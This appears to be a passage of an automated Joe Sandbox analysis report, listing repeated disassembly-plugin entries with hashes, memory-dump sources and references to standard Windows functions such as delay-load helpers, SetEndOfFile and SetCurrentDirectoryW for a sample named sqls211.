                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 9d6cf4b5cab08ad41f9333296d35707b8d5b8e826d68c3a0e98c8370b617e743
                                                                                                            • Instruction ID: 32b4fe423967cc5005fa365fee481c6c3c90d30bb60a30702c8974e5a6ee6657
                                                                                                            • Opcode Fuzzy Hash: 9d6cf4b5cab08ad41f9333296d35707b8d5b8e826d68c3a0e98c8370b617e743
                                                                                                            • Instruction Fuzzy Hash: 07A001E63AD18ABC354872566E46C7B021DC4C5B69330893FFA16C86C2A89068457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 82edf685798d621dac3ae1328fceb84549465ea026689a039c2399c7060ae2f4
                                                                                                            • Instruction ID: 2a5b9199aa232d9c2ae8bc71c6e955bbead33276d006ddaca92ff94550044b79
                                                                                                            • Opcode Fuzzy Hash: 82edf685798d621dac3ae1328fceb84549465ea026689a039c2399c7060ae2f4
                                                                                                            • Instruction Fuzzy Hash: 3CA001E62A919A7D324872566E46C3B025DC8C1B29330952FFA25E96D1AC9018456873
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: b6af567acd30339c259eaab2d5594f8893139c0fb6a739c5cb18bc77e48814b4
                                                                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                                                                            • Opcode Fuzzy Hash: b6af567acd30339c259eaab2d5594f8893139c0fb6a739c5cb18bc77e48814b4
                                                                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 5566987519b71ef7e774841d93a8c1c6646147044e8beeac51355f7f0b77709b
                                                                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                                                                            • Opcode Fuzzy Hash: 5566987519b71ef7e774841d93a8c1c6646147044e8beeac51355f7f0b77709b
                                                                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 0ce9e03acd2583b185641c2a54a4d00dc50c68018bfb738a5e05145523d0ecd2
                                                                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                                                                            • Opcode Fuzzy Hash: 0ce9e03acd2583b185641c2a54a4d00dc50c68018bfb738a5e05145523d0ecd2
                                                                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 0d08c898f319bc5651ef4db13299a43d7ebecb1467a9303be3b73c563d119de6
                                                                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                                                                            • Opcode Fuzzy Hash: 0d08c898f319bc5651ef4db13299a43d7ebecb1467a9303be3b73c563d119de6
                                                                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE3FC
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: b693e4d475864cc74b716d8693bc2985ae86db523dafb35ec95bc33c07f5a160
                                                                                                            • Instruction ID: 47e17a36c2b48d80d0e6dbf447357391c3378baf4693bede2209d33845f68460
                                                                                                            • Opcode Fuzzy Hash: b693e4d475864cc74b716d8693bc2985ae86db523dafb35ec95bc33c07f5a160
                                                                                                            • Instruction Fuzzy Hash: 73A001E62AD19ABC324872566E46C3B025DC8C5B65330992FFA16D96D1A89018456873
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 1b274f8cd3f9d2a607d58651f3c5542a9002eeb84f3f71a852d07ed7906640b8
                                                                                                            • Instruction ID: 193db1a61880c5c030977c10d5db240c3490fb630d45c57191d75820dfea41e9
                                                                                                            • Opcode Fuzzy Hash: 1b274f8cd3f9d2a607d58651f3c5542a9002eeb84f3f71a852d07ed7906640b8
                                                                                                            • Instruction Fuzzy Hash: F6A002D565D1557C314471566D46C37011DC4C5B55331556FF615C95C1784018556471
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: adcb99dfc991f71df1ae2791909b4f193acffcfc4cf7fd555a740dd5212139dc
                                                                                                            • Instruction ID: 193db1a61880c5c030977c10d5db240c3490fb630d45c57191d75820dfea41e9
                                                                                                            • Opcode Fuzzy Hash: adcb99dfc991f71df1ae2791909b4f193acffcfc4cf7fd555a740dd5212139dc
                                                                                                            • Instruction Fuzzy Hash: F6A002D565D1557C314471566D46C37011DC4C5B55331556FF615C95C1784018556471
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 3dbaaff6afa2cbb29aafd789de013f9d21759909143e5035d05608ec215c2d62
                                                                                                            • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                                                                            • Opcode Fuzzy Hash: 3dbaaff6afa2cbb29aafd789de013f9d21759909143e5035d05608ec215c2d62
                                                                                                            • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 7c78d723a8bd3918b72f3d0f59feca77159121e044cce37c56d5e83538066ef1
                                                                                                            • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                                                                            • Opcode Fuzzy Hash: 7c78d723a8bd3918b72f3d0f59feca77159121e044cce37c56d5e83538066ef1
                                                                                                            • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: eb22ee22fe6dad20b1519a43e0cf0d5b72b90a34e09786fd39c9489a37214597
                                                                                                            • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                                                                            • Opcode Fuzzy Hash: eb22ee22fe6dad20b1519a43e0cf0d5b72b90a34e09786fd39c9489a37214597
                                                                                                            • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE51F
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 9e3452e7403f15d43d7ce7c3167173f3f19810501c363a2e55eb637d354a169c
                                                                                                            • Instruction ID: 688717c995739e6a5463b50fc0dcd8fbee6b4dc69c5b5ef4eb25c7cd541061a1
                                                                                                            • Opcode Fuzzy Hash: 9e3452e7403f15d43d7ce7c3167173f3f19810501c363a2e55eb637d354a169c
                                                                                                            • Instruction Fuzzy Hash: F7A001D66AD58ABC3148725A6E46C3B162DC4D6FA9370992FFA16CC6C1B8801C457872
                                                                                                            APIs
                                                                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE580
                                                                                                              • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                                                                              • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                            • String ID:
                                                                                                            • API String ID: 1269201914-0
                                                                                                            • Opcode ID: 660f5bf91a88677a87905fe960a9c62afe201a4632cd29bb22dcd2654adcbec3
                                                                                                            • Instruction ID: 42add9c61b296add59a1348830954788e19fa5e51da7a8f458f030caa9ad4914
                                                                                                            • Opcode Fuzzy Hash: 660f5bf91a88677a87905fe960a9c62afe201a4632cd29bb22dcd2654adcbec3
                                                                                                            • Instruction Fuzzy Hash: 63A011C22A80883C3008B2A22E82C3B022CC8C0B2A330822FFA00C82C0B88008002832
                                                                                                            APIs
                                                                                                            • SetEndOfFile.KERNELBASE(?,00CC903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CC9F0C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000CFE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D05000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056063887.0000000000D22000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056123969.0000000000D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_cc0000_sqls211.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File
                                                                                                            • String ID:
                                                                                                            • API String ID: 749574446-0
                                                                                                            • Opcode ID: 213ecbf179ae96e554054b617548102978a48f65569dcbac4b993f0a496b7d29
                                                                                                            • Instruction ID: b71d1c34e2aa4a9568177139f87d60ad5b95fbd3556761eb7e23fef4d78663a9
                                                                                                            • Opcode Fuzzy Hash: 213ecbf179ae96e554054b617548102978a48f65569dcbac4b993f0a496b7d29
                                                                                                            • Instruction Fuzzy Hash: 46A0223008000E8BCE802B30CE0832C3B20FB20BC030002E8A00BCF0B2CF23880BCB22
                                                                                                            APIs
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00CDAE72,C:\Users\user\Desktop,00000000,00D0946A,00000006), ref: 00CDAC08
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.2056014202.0000000000CC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00CC0000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.2055998832.0000000000CC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.2056046787.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
